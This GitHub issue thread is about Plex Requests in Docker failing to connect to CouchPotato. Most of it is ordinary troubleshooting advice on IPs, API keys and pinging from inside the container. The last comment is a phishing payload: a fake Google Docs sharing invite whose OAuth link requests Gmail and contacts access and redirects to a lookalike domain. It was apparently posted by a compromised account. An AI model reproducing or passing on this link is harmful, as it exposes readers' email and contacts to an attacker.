### ISSUE TITLE
Can't connect to Couchpotato

### ISSUE THREAD

**Issue by oowtfmate** [lokenx/plexrequests-meteor#357]
Hi all,

I've done a search and saw that some people are having the same issues as mine but I wasn't able to find a solution. I'm currently using plexrequest as a docker and am having issues connecting CP. I've successfully connected sonarr with no issues yet when I try to test CP, I get an Error! message. When looking at the logs, nothing comes up as an error. 

I am using apache but I'm not sure why it would interfere as I am using the local host IP to connect with the default port. Sonarr and CP are both routed through apache externally and work fine. 

Thanks in advance!

**Comment by rigrassm** [comment]
Are you using 127.0.0.1 or localhost? Are you updating the settings b before hitting test? Also double check the API key is correct, no extra spaces or anything like that.

**Comment by oowtfmate** [comment]
I'm using the local ip of the system: 192.168.1.xx. When doing this for sonarr, it works fine. I did save the settings before test and the api is correct.

**Comment by rigrassm** [comment]
Try getting a shell in the docker container and see if your able to ping
the cp ip address

**Comment by oowtfmate** [comment]
Ricky, thanks for the suggestion. My knowledge of how to do that is pretty
elementary. I do have SSH access to my server. Would you mind sending me
the commands so I can run the proper check?

**Comment by rigrassm** [comment]
Try these suggestions here. I don't work with docker much and don't know the exact method/commands needed to connect and test from memory. Google should have plenty of resources to comb through though.

**Comment by oowtfmate** [comment]
I've gotten root access in the docker and ran a ping to the cp server (@192.168.1.xx:5050 and at 0.0.0.0:5050) and am getting unknown host as the output.

**Comment by rigrassm** [comment]
Were you ever able to get this up and running?

**Comment by oowtfmate** [comment]
Justin Vuong has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=187102321219-1cb4b2gdr0bqv5u5n35vi1hecjcp1sjg.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.docscloud.download%2Fg.php&customparam=customparam>
